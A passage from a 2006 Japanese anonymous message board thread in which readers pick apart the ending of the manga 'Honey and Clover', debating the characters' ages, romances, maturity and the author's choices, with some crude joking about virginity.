同人気分で鼻歌混じりに描いてたのに、思いもよらぬ人気に
作品が一人歩きしちゃった感が否めない

そしてプレッシャーに負けて早々と終了させてしまった…そんな気がする

104 :花と名無しさん:2006/08/05(土) 21:27:00 ID:???0
ウミノたん
http://210.150.210.38/cgi-bin/peni/img/37001.jpg

105 :花と名無しさん:2006/08/05(土) 21:30:07 ID:???0
うお〜「自分探し」で喧嘩しておるぞ!
 
青春じゃ青春じゃ!

106 :花と名無しさん:2006/08/05(土) 21:45:42 ID:???0
>>72>>89
全然逆じゃなくて同じことを言ってると思う

107 :花と名無しさん:2006/08/05(土) 21:49:27 ID:???0
ちがうよ。

>>72 森田は天才ばかりのところへ行った。

>>89 森田は凡人ばかりのところに行った。

108 :花と名無しさん:2006/08/05(土) 21:49:52 ID:???0
この終わりかた、ある意味みんながイヤだって言ってた
「数年後・・・」みたいな締め方だもんね。
「数ヵ月後・・・」だもん。消化不良。

109 :花と名無しさん:2006/08/05(土) 21:50:18 ID:???0
あっ、逆だった。ごめん。

110 :花と名無しさん:2006/08/05(土) 21:51:45 ID:???0
モラトリアン=童心のままにものを作る人
天才と凡人とかにこだわって見るから>>107みたいに間違うのでは…

111 :花と名無しさん:2006/08/05(土) 21:51:46 ID:???0
>>104
和服が似合ってるな

112 :花と名無しさん:2006/08/05(土) 22:08:52 ID:???0
童貞たけのこはどこで筆おろしすんのかな?
親方が地方の風俗にでも連れてってくれそうだが

113 :花と名無しさん:2006/08/05(土) 22:14:08 ID:???0
童心のままに物を作ることを許された人=才能ある人
つまりそういう人間は、モラトリアムを卒業しなくても許されるわけだ。
はぐが自立しないのもそういうことなのかな。
その次元でのみ森田と繋がっていられるんだし。

114 :花と名無しさん:2006/08/05(土) 22:14:55 ID:???0
自分探しの旅って途中で世話になった家とか店で筆下ろしまでされる事もあるそうな。
無論、向こう側の誘いで。

115 :花と名無しさん:2006/08/05(土) 22:18:10 ID:???0
最終回時点でたけのこ23
真山25
山田24
はぐ22
森田27でOK?
修ちゃん35くらい?

みんな処女童貞でたまりますか?第一話以前にみんな失ってることにしよ

116 :花と名無しさん:2006/08/05(土) 22:19:11 ID:???0
>>115
それは俺に喧嘩売ってるのか?

117 :花と名無しさん:2006/08/05(土) 22:22:16 ID:???0
>>116
どこらへんがご不満だった?

118 :花と名無しさん:2006/08/05(土) 22:24:29 ID:???0
>>117
25童貞の俺への挑戦状と受け取った

119 :花と名無しさん:2006/08/05(土) 22:25:36 ID:???0
妖精になれるよ(´・ー・`)

120 :花と名無しさん:2006/08/05(土) 22:26:56 ID:???0
森田に忍び寄る三十路の足音

121 :花と名無しさん:2006/08/05(土) 22:31:34 ID:???0
>>119
勝ち誇った顔すんな

122 :花と名無しさん:2006/08/05(土) 22:36:53 ID:???0
て(´・ー・`)√

123 :花と名無しさん:2006/08/05(土) 22:40:06 ID:???0
>>122
君の初体験はいつだ?
詳細に述べよ

124 :花と名無しさん:2006/08/05(土) 22:45:34 ID:???0
謎なのは、真山の女お持ち帰り設定が、後に作者によって否定されたことだな。
リカさんが初めて、っていう風にしたかったんだろうか・・・。


125 :花と名無しさん:2006/08/05(土) 22:47:53 ID:kFTUEcYn0
http://www.mangaoh.co.jp/ の、9月コミック発売先行版に
9月8日『ハチミツとクローバー』10巻があるんですけど、
9巻出たばっかでびっくり。

126 :花と名無しさん:2006/08/05(土) 22:50:22 ID:???0
>>124
相当気持ち悪い設定だなw

127 :花と名無しさん:2006/08/05(土) 22:59:35 ID:???O
>>126
そんな設定いらないのに。
なんでそんなに処女性にこだわるんだ。

128 :花と名無しさん:2006/08/05(土) 23:01:15 ID:???0
>>127
ほら、理科=作者だから…

129 :花と名無しさん:2006/08/05(土) 23:04:42 ID:???O
ゲンナリだよ…竹も森も真山も童貞だったら全部同じじゃん。
結局ラストもリカ、山田、はぐも結末は同じようなもんだから、それしか描けない人なのか

130 :花と名無しさん:2006/08/05(土) 23:05:53 ID:???0
女キャラ=作者
男キャラ=作者の理想w

131 :花と名無しさん:2006/08/05(土) 23:43:19 ID:???0
いや、書いてるウミノが処女だから・・

132 :花と名無しさん:2006/08/05(土) 23:50:42 ID:???O
それはないだろ、離婚歴もある40前の女が。
そこまでいうのはあんまり・・・

133 :花と名無しさん:2006/08/05(土) 23:55:14 ID:???0
>>125
>>58

>>115
アニメ特別編の将棋話で
フツーに貞操は捨ててるだろと思われる修まで
若い時代に合コンひとつにも行けなかった
・・・まさしく>>116状態(台詞まで一緒)ということにされてて
はぐが合コンの話題を真山に振られ、ガタガタ震えてるのを見て
「はぐには困っちゃうのぁ〜ww人見知りが激しくってさぁ〜wwうふふふあははは〜」(←マジでこんなん)
とか言って(当然真山や竹本に心の声でツッこまれる)体くねらせてるの観てから
自分の中で修というキャラの何かが壊れた
そんで
「好きさ大好きさ!」とかやられても
しょっぱくてしょっぱくて・・・


134 :花と名無しさん:2006/08/05(土) 23:55:45 ID:???0
腐女子って、偏見で、恋愛経験無い人なのかと思ってたんだけど
そうでもないのかな。
なんというか、男と男の恋愛に萌える人が、自分と男の恋愛をどうとらえるか
想像つかなくて。

あーでもウミノさんが恋愛結婚かどうかは分からないか。

135 :花と名無しさん:2006/08/06(日) 00:01:54 ID:???0
>>134
現主婦で同人やってる人、今はイパーイいますよ

「社会における女性としての役割を果たす自分」のマスクと
「同人にうつつ抜かす自分」のマスクを
使い分けてる人が大多数。


136 :花と名無しさん:2006/08/06(日) 00:05:16 ID:???0
>>135
完全にスレ違い承知で好奇心で聞いていい?
そういう人は、自分の彼氏or夫が男といちゃつくところを想像するとモエるの・・・?
それとも現実と2次元は別?
だとしたら男のロリコンオタクとかよりは理性的なんだね。

137 :花と名無しさん:2006/08/06(日) 00:07:44 ID:???0
>>133
>「はぐには困っちゃうのぁ〜ww人見知りが激しくってさぁ〜wwうふふふあははは〜」

あれはひいた。あの時点でもひいたのに、今となっては絶句。

138 :花と名無しさん:2006/08/06(日) 00:14:55 ID:???0
>>136
人による・・・としか言えないが
「いちゃつくところを想像するとモエる」ことができるほどの
ヴィジュアルを持つ夫または彼氏を得ることの出来る人は(同人女じゃなくても)ほとんどいない
ため、
「2次元萌は所詮2次元萌」と割り切る人がほとんどかと。
むしろリアルにおけるホモの存在を嫌悪する人すらいる…(「想像(イメージ)が壊される」とかいう理由で)。

そろそろスレ違いなんで逝ってきます

139 :花と名無しさん:2006/08/06(日) 00:18:41 ID:???0
うわーやっぱどう考えても臭はぐはきもいな!
恋愛関係にならなくとも、
臭がはぐを巣立たせる気を無くした時点でかなりきもい。

140 :花と名無しさん:2006/08/06(日) 00:41:15 ID:???0
>>139
ヒロインをゲットする野郎がみ〜んな女に粘着質に構って
依存させて囲い込むタイプ
新参者も青春スーツを再装着ということになってるけど
そんなサワヤカなもんじゃないね

同じ関係が観覧車のようにジワジワグルグル回りつづけて病んでますから

141 :花と名無しさん:2006/08/06(日) 00:45:56 ID:???0
同人さんて理解できないな。

>>124
自分は、後から出てきた手馴れてる設定の野宮と比較するためだと思ってたよ。
でもよく考えたら、
「昔遊び人、今は落ち着いた」野宮の発展途上バージョンである真山は
「今遊び人」であってもなんら問題ないね。

142 :花と名無しさん:2006/08/06(日) 00:50:15 ID:???0
>>140
そういわれると・・・誰を応援していたわけでもないが、
はぐには竹本か森田を選んで欲しかったな。ほんとに。

143 :花と名無しさん:2006/08/06(日) 00:55:29 ID:???0
>>140
確かに修も真山も野宮も、女にねちっこく執着するタイプだ・・・。

144 :花と名無しさん:2006/08/06(日) 00:58:40 ID:???O
>>143
男はストーカーになれば成就する☆
女はお姫様扱いしてくれる人を選ぶんだよ☆


こういうメッセージなのか?

145 :花と名無しさん:2006/08/06(日) 01:02:20 ID:???0
こんなに難易度高いw漫画だとは知らずに読んでた

146 :花と名無しさん:2006/08/06(日) 01:02:43 ID:???0
恋愛は全部ストーカー絡みでしか描けないのかねこの人は
ジャンプの銀魂みたいだ

147 :花と名無しさん:2006/08/06(日) 01:03:15 ID:???0
>>144
どんだけ病気だよw

148 :花と名無しさん:2006/08/06(日) 01:04:53 ID:???0
ギャグじゃなくてマジなところが救えない >(真山のストーカーに代表される)変質的な愛

149 :花と名無しさん:2006/08/06(日) 01:05:42 ID:???0
>>146
いや、あれは徹頭徹尾センチメンタルなギャグだからwww

150 :花と名無しさん:2006/08/06(日) 01:06:15 ID:???0
>148
スガシカオの「あまい果実」とかスッゴイ好きそうだし・・・羽海野たん

151 :花と名無しさん:2006/08/06(日) 01:07:06 ID:???O
可能性がなくても諦めないというのは、一見一途で素敵な感じがするが、実際は空気嫁じゃね?



152 :花と名無しさん:2006/08/06(日) 01:08:28 ID:???0
>>151
ハチクロではそれが許されるんだよ。そんなワールド。

153 :花と名無しさん:2006/08/06(日) 01:09:09 ID:???0
というか、可能性の無い恋愛に安住の地を見つける精神性に着眼してるのかなと

154 :花と名無しさん:2006/08/06(日) 01:09:12 ID:???0
ハマーを図々しくすると真山になる感じ。

155 :花と名無しさん:2006/08/06(日) 01:12:45 ID:???0
>>153
わかる。「傷つきたくない」願望が根底にあるんだよな。
だから「自分をミンチにする機械に飛び込」んだエピソードの時なんかは
感動できたんだが
今となっちゃあ、なんだかな・・・

156 :花と名無しさん:2006/08/06(日) 01:15:12 ID:???O
>>153
途中まではいいけどそれ以上は酔ってるだけに感じた。
友達がフラれた時に、フラれてもまだ好きなの!とか言われても初めは同調するけど、それが何ヵ月も続いて聞かされたら、それはただの執着だろ!とうざくなるのと同じ印象

157 :花と名無しさん:2006/08/06(日) 01:32:32 ID:???0
要するに自己愛が強すぎるんだよね

158 :花と名無しさん:2006/08/06(日) 01:49:12 ID:???0
はぐは、自分の芸術を完成させるためにそばにいてくれたら
便利なので人生をくださいといっているようにみえてしまふ。
そこに恋愛感情はないように思うのだが?
はぐは、いがいと打算的だったのかもと思ってしまった。


159 :花と名無しさん:2006/08/06(日) 02:04:40 ID:???O
>>158
そうだよ。
パトロンがほしいだけ

だからラストで恋愛感情はないから別の形でお返ししなきゃと言っていた。
たけのこは、臭は自分でハアハアできるヒトだからいいんだよと言っていた

160 :花と名無しさん:2006/08/06(日) 02:06:07 ID:???0
しょっぱいよう・・・

161 :花と名無しさん:2006/08/06(日) 02:09:28 ID:???O
それであれだけ感動できる人達はすごいな。というか見せ方の上手さで誤魔化されてるってことかしら。

162 :花と名無しさん:2006/08/06(日) 02:11:32 ID:???0
そんな美しい恋愛が普遍的に存在してるのか?

163 :花と名無しさん:2006/08/06(日) 02:16:19 ID:???O
>>162安価つけて

164 :花と名無しさん:2006/08/06(日) 02:18:16 ID:???0
花本は衣食住を与えた上死ぬまで仕える変態下僕

森田は見えない鎖で繋がれた稼ぎのいい愛玩動物

竹本ははぐの事なら何でもマンセーな逝カレた信者

165 :花と名無しさん:2006/08/06(日) 02:22:26 ID:???0
>>163
ごめん
ただね、なんとなく付き合ってるやつが多いなと思ってさ

166 :花と名無しさん:2006/08/06(日) 02:23:32 ID:???0
>>161
>見せ方の上手さで誤魔化されてるってことか

今まではそうだったかも知らんが、最近になって
「見せ方の上手さ」より「組み立て方のマズさ」が目に付くようになってしまい
幻滅する読者が出てきてるわけで。

167 :花と名無しさん:2006/08/06(日) 02:25:41 ID:???O
>>165
偽善と綺麗事で塗り固められてるからね〜。
純粋にハチクロ好き!感動した!って層はどういう人達なんだろうね。

個々のエピにぐっと来たらストーリーはあまり気にしないヒトなのかな

168 :花と名無しさん:2006/08/06(日) 02:33:56 ID:???0
>>167>純粋にハチクロ好き!感動した!って層はどういう人達なんだろうね。

これは「偽善と綺麗事で塗り固められてる」漫画なんだ、と、割り切って楽しんでる人達。



「掲載誌の事情や、商業色の強いヒット に影響を受けず、
作品初期の頃のノリや哲学で描ききったハチクロ」を
観てみたかった・・・
 
と、願うのは馬鹿げてるとは思うが、そんな思いを捨てきれない('・ω・`)

169 :花と名無しさん:2006/08/06(日) 02:47:56 ID:???0
>>104
テラカワイソス

170 :花と名無しさん:2006/08/06(日) 02:50:44 ID:???0
もし掲載されてたのがりぼんだったら竹本か森田とくっついてたんだろうなぁ。
仮に修とくっつけようとしてたとしても編集部からストップかかるだろうし。


171 :花と名無しさん:2006/08/06(日) 02:51:19 ID:???0
>>104 真山のティ*ポじゃん…

172 :花と名無しさん:2006/08/06(日) 02:55:56 ID:???0
誰と誰がくっつくのくっつかないだの、
フったフられただの、
ヤったヤらないだの 
...といったことに終始する漫画ではなかった、つーことやね

173 :172:2006/08/06(日) 03:01:56 ID:???0
あぁ、あくまで森田竹本花本サイドの話ね。

174 :花と名無しさん:2006/08/06(日) 03:08:46 ID:???0
>>172
>森田竹本花本サイド
における、
自分の中に潜むエゴとの葛藤や
他者と関わるという行為の意味づけ、視点の変化に伴う冒険…
等のテーマ性は、わりと良かったと思う。
ただ、作品としての見せ方が稚拙だったのと
「才能のせいでヒトは云々」のあたりはお粗末だった…。

175 :花と名無しさん:2006/08/06(日) 07:57:31 ID:???0
原田梨花って漫画家いるよね
こないだ本屋で見かけてオッて思った。
リカって読むのかな〜

176 :花と名無しさん:2006/08/06(日) 07:57:56 ID:Xglo9/s8O
!!!!9巻出てるの!!?
★*:.。. .。.~・゜
  。.~・゜
 ~.。.
(`・∀) (∀"*)*
| o o| ゜



177 :花と名無しさん:2006/08/06(日) 09:16:34 ID:???0
いつかのトビラ絵で、

はぐ→ハイジ
あゆ→クララ
修→おじいさん
ミドリちゃん→ヤギ
リーダー→イヌ(ヨーゼフ?)

として描かれてるファンタジーテイストのイラストがあった

「好きさだいs(ry」を目にしてしまった今となっては
白々しさ抜群・・・orz





178 :花と名無しさん:2006/08/06(日) 09:31:13 ID:Fch+2eJR0
森田は真心ブラザーズのYO−KINGがモデルってのは本当ですか

179 :花と名無しさん:2006/08/06(日) 10:06:03 ID:???0
>>178
漫画系のインタビューサイトでは「森田にはモデルはいない」と
ウミノ☆さんは発言してる。

しかし、音楽CD販売サイトでは
「森田のモデルの一人がYO−KING」のような発言もしてる。

これらの事実から、あなたが自分で判断しなさい。

180 :花と名無しさん:2006/08/06(日) 10:06:32 ID:???O
>>178
倉持じゃなかった?

181 :花と名無しさん:2006/08/06(日) 10:33:00 ID:???0
YO-KING=倉持

182 :花と名無しさん:2006/08/06(日) 11:08:24 ID:???0
ウミノ☆は真心もすきなのか

183 :花と名無しさん:2006/08/06(日) 11:21:40 ID:???0
ソニー関係がアニメ主題歌をタイアップしているから、またゴマすってるのかなあとオモタ

184 :花と名無しさん:2006/08/06(日) 11:43:42 ID:???0
最初の一〜二話の森田は流川入ってるし
マサルさんも入ってるし

185 :花と名無しさん:2006/08/06(日) 11:56:33 ID:???0
>>184
バイト後の寝太郎っぷり、確かに流川入ってた

186 :花と名無しさん:2006/08/06(日) 12:02:29 ID:???0
李歐も入ってるんでしょ

森田よ君は大陸の覇者になれ
はぐは君の夢を見るから

187 :花と名無しさん:2006/08/06(日) 12:03:35 ID:???0
ルックスが真心

188 :花と名無しさん:2006/08/06(日) 12:30:42 ID:???O
竹本→はぐ以外 目が向かないムッツリ変態
はぐ→自分の都合のよい方向にばかりもっていく変態
森田→小さな子にしか恋ができない超変態
山田→粘着変態
真山→異常なストーカー変態
花本→普通とは違う恋愛感情をもつ変態

189 :花と名無しさん:2006/08/06(日) 13:15:34 ID:???0
山田にはキャラの薄くなった真山みたい男じゃなくて
もっと違ったタイプの男をあてがえば良かったのに
山崎みたいな明るい男とか

やり方は違えど
真山と野宮の恋愛攻略法は根っこが同じ

190 :花と名無しさん:2006/08/06(日) 13:35:47 ID:???0
まあ山田も薄いしな。
どこまで真山スキーで引っ張るんだよ。

191 :花と名無しさん:2006/08/06(日) 13:49:28 ID:???0
山田はローマイヤー先輩の嫁に行って
天然酵母パン焼いて子沢山になったらよかったのにw

192 :花と名無しさん:2006/08/06(日) 14:19:13 ID:???0
>>191
それでこそ鉄人なのにな

193 :花と名無しさん:2006/08/06(日) 14:28:38 ID:???0
パンも陶芸も焼けるもんな

194 :花と名無しさん:2006/08/06(日) 14:32:56 ID:???0
山田は1回くらい傷害でぶちこまれときゃよかったんだよ

195 :花と名無しさん:2006/08/06(日) 15:34:33 ID:???0

死んだ夫をいつまでも忘れられないリカに執着する真山と
真山をいつまでも忘れられない山田に執着する飲み屋

196 :花と名無しさん:2006/08/06(日) 15:36:12 ID:???0
未亡人リカが原田を忘れられないのはわかるが
山田がいつまでもウジウジ真山にこだわってるのは
「ウザッ」と思うなぁ。


197 :花と名無しさん:2006/08/06(日) 15:48:33 ID:???0
なんで、山田は真山をそこまで忘れられないんだろう??
そもそも好きになったきっかけや、真山から離れられないような
出来事とかなんか描かれてないから謎。

198 :花と名無しさん:2006/08/06(日) 15:53:22 ID:???0
>>197
身近にいて優しくしてくれるからなんじゃないか>山田→真山
真山がいつまでもリカを忘れられなかったのと同じ
こいつらはループしてやがる

199 :花と名無しさん:2006/08/06(日) 15:58:34 ID:???0
いつリカが真山に優しくした?

200 :花と名無しさん:2006/08/06(日) 15:59:00 ID:???0
でも、森田さんも山田に優しいよね?
なんで、山田は森田さんじゃなかったんだろう??

野宮だって、まぁ好きだからってのもあるけど、
十分に山田に優しいわけで。

すごく疑問に思ったんだけど、野宮って歳はいくつ位の設定なの?

201 :花と名無しさん:2006/08/06(日) 16:03:30 ID:???0
30位じゃね?

202 :花と名無しさん:2006/08/06(日) 17:00:33 ID:???0
山田さんは男なら誰でも好きになるようなタイプの美女だから

203 :花と名無しさん:2006/08/06(日) 17:15:17 ID:YttywHKC0
竹本って人格崩壊したか?俺から見れば普通のやつなら通りそうな人生経験だと感じたけどな。
真山だけがリカと幸せになんのかよ

204 :花と名無しさん:2006/08/06(日) 17:29:19 ID:???0
>>203
だって真山は羽海野のお気に入りだから。

多分臭≧真山>はぐみ>リカ>>>>>森田>飲み屋>あゆ>>>>>>>竹本の順で好きなんだろ

205 :花と名無しさん:2006/08/06(日) 17:49:33 ID:3Hj2Cfyf0
竹本で801

206 :花と名無しさん:2006/08/06(日) 18:14:16 ID:???0
真山より森田の方が、山田に優しくしていたと思うのにね。

207 :花と名無しさん:2006/08/06(日) 18:16:59 ID:???0
竹本は義父やクリスマスネタで結構負の面も素直に描かれてて
捻くれることもあるけど基本善良な人間だと思ってたから
なんか急にらしくない暗黒面出してきて違和感あったな
竹本の劣等感ってもう少し違う感じで受け止めてたんだけど
作者がああ描いた以上そういうキャラだったんだと思わないといかんのだな

208 :花と名無しさん:2006/08/06(日) 18:31:55 ID:???0
>>206 そうだよね。真山は野宮が言ったように山田の想いにこたえられない
がための罪悪感からの優しさは感じたけど。
森田の方が、よっぽど山田に優しかったよ。

209 :花と名無しさん:2006/08/06(日) 18:33:23 ID:???0
最終回を読んだ時
「ハチミツとクローバー・・・確かにまあ文字通り・・・ハチミツとクローバーだなぁ・・・」
と思った自分。
友人曰く「ジャムクロとかバタクロでもよかったんじゃないのこれ」と言ってた。

210 :花と名無しさん:2006/08/06(日) 18:34:34 ID:???0
森田や野宮はただ単に優しかっただけけど
真山は山田を振った後でも優しくしていた
この辺が山田のツボだったのでは
つまりマゾってことだ

211 :花と名無しさん:2006/08/06(日) 19:05:39 ID:???0
山田がごく普通の女ならあんなに気を遣う必要はない。
観覧車の話で野宮に任せられると思った真山は肩の荷が下りた事だろう。
放置したら放置したで厄介な女だし。

212 :花と名無しさん:2006/08/06(日) 19:08:07 ID:???0
山田は山田優のようなボディーなのかな?

213 :花と名無しさん:2006/08/06(日) 19:10:10 ID:???0
修ちゃんのはぐへの愛情って、異性に対してのものなの??
はぐの修ちゃんへのは戦う人を選んだもので、もっと違う意味での
愛情だと思うのだが。。。。

214 :花と名無しさん:2006/08/06(日) 19:11:44 ID:???0
>>211 普通の女じゃないって、どういう意味?

215 :花と名無しさん:2006/08/06(日) 19:13:02 ID:???0
糞化した竹本に「金と才能の男」呼ばわりされてた森田だけど
森田って、山田にすごく思いやりあったよね。
ただベタベタ甘やかすだけの優しさじゃない
優しさや思いやりで山田のことを見てた。


>>197
>真山から離れられないような出来事

1回目の夏祭りでホイップちゃんをサッと取ってあげた時のように
時々優しくして、山田をキューンとさせるんだろうなコイツ。
で、野宮にそこを「山田をキープしてる」みたいに
つっこまれてた。




216 :花と名無しさん:2006/08/06(日) 19:15:19 ID:???0
>>213
>修ちゃんのはぐへの愛情って、異性に対してのものなの??

森田 「おまえ、あいつ(はぐみ)のこと、好きなのか?」
修司 (カアッ/////赤面) 「ああ!好きさ!大好きさ!(赤面)」


山田 「先生も男だったんですね」
修司 (赤面)

217 :花と名無しさん:2006/08/06(日) 19:23:13 ID:???0
野宮は35歳だそうな。意外。

218 :花と名無しさん:2006/08/06(日) 19:26:16 ID:???0
えっっ、35なの?

219 :花と名無しさん:2006/08/06(日) 19:28:12 ID:???0
修とはぐは15歳差くらいだよね

220 :花と名無しさん:2006/08/06(日) 19:28:25 ID:???0
野宮もオッサンじゃねえか
もう作者の趣味前面に出まくり

221 :花と名無しさん:2006/08/06(日) 19:28:47 ID:???0
>>217
修と歳がそんなに違わないんだ・・・
山田とは一回り近く離れてるって事?

222 :花と名無しさん:2006/08/06(日) 19:29:54 ID:???O
ということはヒロイン二人は30男たちにかっさらわれたんですね…
じゃあ美和子は先輩だしもっと上なの?

223 :花と名無しさん:2006/08/06(日) 19:30:35 ID:???0
そろそろお腹の出てくる35歳…。
野原ひろしと同年齢ってどうなの。

224 :花と名無しさん:2006/08/06(日) 19:31:16 ID:???0
この漫画のキャラはみんな10歳くらい逆サバ読んでると思う。

225 :花と名無しさん:2006/08/06(日) 19:33:56 ID:???0
山田って24くらいじゃないの?

226 :花と名無しさん:2006/08/06(日) 19:36:52 ID:???0
30代半ばの男や女が
20代前半のピチピチ(ヲバ厨ヲジ厨用語)した異性を
射止める漫画>ハチクロ

森田&竹本も30代半ばくらいになるまで
出直してこいってことか…。
カワイソス。

227 :花と名無しさん:2006/08/06(日) 19:37:46 ID:???0
山田卒業して二年はたってんだよね?
24,5ってとこか

228 :花と名無しさん:2006/08/06(日) 19:40:13 ID:???0
呑み屋35だとは思わなかった
修もだけど見た目を若く描きすぎてる気がする

229 :花と名無しさん:2006/08/06(日) 19:45:52 ID:???0
修も35なの?

230 :花と名無しさん:2006/08/06(日) 19:50:57 ID:KNFeAcS50
>>217
そんなこと書かれてた?
そしたら美和子さん何歳よ?
リカより年上になっちゃうじゃん。

231 :花と名無しさん:2006/08/06(日) 19:51:44 ID:???0
修がなぞ。そもそも教授ポジションなんて30代じゃほぼ不可能。
よっぽど凄い才能あるとか、無名大学とかならありうるが。
助教授にしときゃよかったのに。作者大学行ってないからわからんの
だろうけど。

232 :花と名無しさん:2006/08/06(日) 19:52:06 ID:???O
若く描きすぎてると言えば竹本のお母さんだよね
大学生の息子がいるなら45歳くらいだろうに。


233 :花と名無しさん:2006/08/06(日) 19:54:02 ID:???0
歳相応にリアルに描かれてるキャラは根岸の母ちゃんだけだな

234 :花と名無しさん:2006/08/06(日) 19:54:55 ID:???0
ヤングユーが廃刊してから読んでなかったけど
えぇー!修とはぐがくっついたの!!
いつからそんなことになってたんだぁ〜びっくり!!!

235 :花と名無しさん:2006/08/06(日) 19:55:32 ID:???0
>>224
>>228
ハチクロ世界のピチピチ肌の女の子は実は中身が40歳
修も野宮も膿脳内デ年下だとしたらその謎は解ける・・・

236 :花と名無しさん:2006/08/06(日) 19:56:20 ID:???0
>>230 いや、某サイトに35歳って設定だって書いてあったので。

237 :花と名無しさん:2006/08/06(日) 19:57:57 ID:???0
でも、9巻に30過ぎた大人が。。。ってあったから
30〜35の間ではある気がする。32、33歳くらい?
美和子さんが35くらい?

238 :花と名無しさん:2006/08/06(日) 19:58:00 ID:???0
>>229
はぐが18の時33とか言ってる人いた

239 :花と名無しさん:2006/08/06(日) 20:04:10 ID:???O
DTじゃない竹本君に価値はありません!!!11111

240 :花と名無しさん:2006/08/06(日) 20:15:15 ID:???O
修だからはぐを好きだ許せたが 開
もし真山みたいな顔や性格だったら ぶっ飛ばしてた

241 :花と名無しさん:2006/08/06(日) 20:28:50 ID:???O
修は講師かと思ってた………

242 :花と名無しさん:2006/08/06(日) 20:38:12 ID:???0
やっと今日最終回読んで来た。
あれ2回にわけてゆっくり描けばよかったのに。
あまりにもあせりすぎじゃない?
野宮と山田の仲直りセッティングとか、説明的すぎてちょっと・・・
最終的に仲直りした場面とかも、今までさんざんひっぱったわりにショボイ。
あれだったら森田と手つないで帰ってたシーンのほうがインパクト強いよー?
今回で切る必要性がまったくわからない!

243 :花と名無しさん:2006/08/06(日) 20:40:12 ID:sLhPwdrsO
修ちゃんは助教授じゃなかったっけ?

244 :花と名無しさん:2006/08/06(日) 20:41:39 ID:???0
正直それがウミノたんの限界なんだろうなと思った>年齢表現
極端なジジババは描けても、30代という微妙な年代のキャラをうまく表現できないんじゃなかろうか。

推定では野宮&山崎は30前後、美和子さんが35前後で修&理花は30後半に見えた。
それを考えると理花の若さと幼さは異常だな、どんな若返りの秘薬を使ってんだよと。

245 :花と名無しさん:2006/08/06(日) 20:41:48 ID:???O
>>219
はぐが22だとしたら、修は37…!!!!!?????

246 :花と名無しさん:2006/08/06(日) 20:47:40 ID:???0
>>244
自分自身が等身大の40代を拒否してるような感じだからねえ

247 :花と名無しさん:2006/08/06(日) 20:53:45 ID:+Ph/9uki0
>>244
映画のリカぐらいのイメージでは?
30代ってそんなに老けてないし
少女漫画の表現だし問題ない。


248 :花と名無しさん:2006/08/06(日) 20:54:16 ID:???0
>>246
なんかすごく納得した

別に外見が若くても気にならないけど
精神まで幼い感じがして設定聞くと驚くんだよね
森田みたいなキャラならまだわかるけど
修とかリカみたいに社会人としてきちんと地位を築いてるキャラも幼すぎて違和感ある
メイン5人だけじゃなく全キャラのモラトリアム描いてるんですって言われたらそれまでだけど
登場人物みんなが子供って改めて考えるとなんか気持ち悪い世界だなぁ

249 :花と名無しさん:2006/08/06(日) 20:54:34 ID:???0
まぁ、おじさんおばさんが上手くかけない人って多いよね、少女漫画家には。
でもそういう人って、たいてい高校生が舞台とか、年齢層低いの描くじゃん。
この人は下手なのに主要人物にもりもりもりこのんでるから妙なことに・・・



250 :花と名無しさん:2006/08/06(日) 20:58:20 ID:???0
>>247
いや、見た目は別にいいんだけど、少女っぽさをあからさまにアピールしすぎて
下手すると精神年齢が初期のはぐよりも低めに見えるのがもうね…。

251 :花と名無しさん:2006/08/06(日) 20:58:34 ID:???0
>>209
ジャムクロワッサン バタークロワッサンみたいだね

サンドイッチの中身のぞく前の竹のこの「もうっ」とかいうセリフ
すんごい気になったんだが・・・いつのまにカマキャラになったのこいつ?

252 :花と名無しさん:2006/08/06(日) 21:04:26 ID:???0
一番大人なキャラって誰だろう。
うーん美和子さん?
森田兄も急に若々しくなったよな最近・・・疲れが取れたのかね。

253 :花と名無しさん:2006/08/06(日) 21:09:58 ID:???0
レギュラーの中から選ぶと美和子かな。

しかしあの世界で一番子供っぽさがなく、真に頼りがいのある大人と言えるのは
ローマイヤ先輩だけだと思う。

254 :花と名無しさん:2006/08/06(日) 21:13:49 ID:???0
美和子さんは大人キャラじゃないような気がする。

255 :花と名無しさん:2006/08/06(日) 21:14:15 ID:???0
>>252
はぐ=問題外
竹本=イマイチ青臭い
森田=恋愛面と日常生活以外は大人
真山=大人になりきれないストーカー
山田=退化の一途
修=最後の最後に大人を捨てた

リカ=仕事面では大人だが他ではなりきれていない
野宮=真山や山田のことを言えないレベルに下がってきている
美和子=大人だが精神性がオバちゃんの域に達している

だめだこの面子

256 :花と名無しさん:2006/08/06(日) 21:14:53 ID:???0
30代前半て、結構見た目若い人多いよ。独身だと特に。

20代後半も30代前半(あるいはもう少し年上)もシワのない
大人だったりするわけで、現実世界では判別ついても、
マンガ絵にすれば同じになってしまっても仕方ないかな・・・

と思う、20代30代に囲まれて仕事をしている30代の私。

257 :花と名無しさん:2006/08/06(日) 21:15:54 ID:???0
ローマイヤ先輩は記号的というか単なる便利キャラだから完全無欠だけど
この人掘り下げたらまたドロドロしたものが出てくるかもしれない

258 :花と名無しさん:2006/08/06(日) 21:16:41 ID:+Ph/9uki0
>>250
いいんじゃないマンガだし。


259 :花と名無しさん:2006/08/06(日) 21:31:56 ID:???0
主要キャラの中で一番大人なのは意外と森田なのかもしれないね。

状況をわかってて、突っ込まれること前提でワザとふざけている部分もあるし、
はぐを相手にしている時でも、竹本がいるときはそれなりに気を使って行動していたし
度を超えた変人ぶりも自分の内面を悟らせないためのパフォーマンスだったのかもわからんねと。

次点は将来性を含めて竹本かな。

260 :花と名無しさん:2006/08/06(日) 21:37:44 ID:???0
>>259
森田は自分の素というか核の感情以外では割と大人に振舞えてるんだよね
だから山田や真山を気遣うことはできてる
ただ如何せん社会生活をまともに送れず周囲に迷惑かけてるのが
マイナスポイントとして印象深い

竹本も周囲を気遣う精神は登場キャラ中上位だと思う
協調性がきちんと育ってる

この二人ははぐという呪縛から逃れたら本人なりに成長できる気がする

261 :花と名無しさん:2006/08/06(日) 21:39:09 ID:???O
森田は大人というかDQNだろ

262 :花と名無しさん:2006/08/06(日) 21:44:48 ID:???0
対山田では周囲で一番真っ当な対応してるんだけど
肝心のはぐ関係がgdgdな印象>森田

263 :花と名無しさん:2006/08/06(日) 21:49:08 ID:???0
原田は大人

264 :花と名無しさん:2006/08/06(日) 21:57:14 ID:???0
ここいらでそれぞれのキャラの長所と短所を書き連ねてみる

はぐ  長所:芸術的才能・・・以外にあったっけ?
     短所:あらゆる意味で子供っぽすぎ、依存心が強い

竹本  長所:基本的には気配りが出来ていて友達思い
     短所:やや直情的で頑固、相手の言葉や態度の裏を読むのがとても下手

山田  長所:江戸っ子気質で男前(初期限定)
     短所:諦めが悪い(良くない意味で)、周囲の事を全然見ていない・また、その自覚がない

真山  長所:仕事も交友関係もソツなくこなす
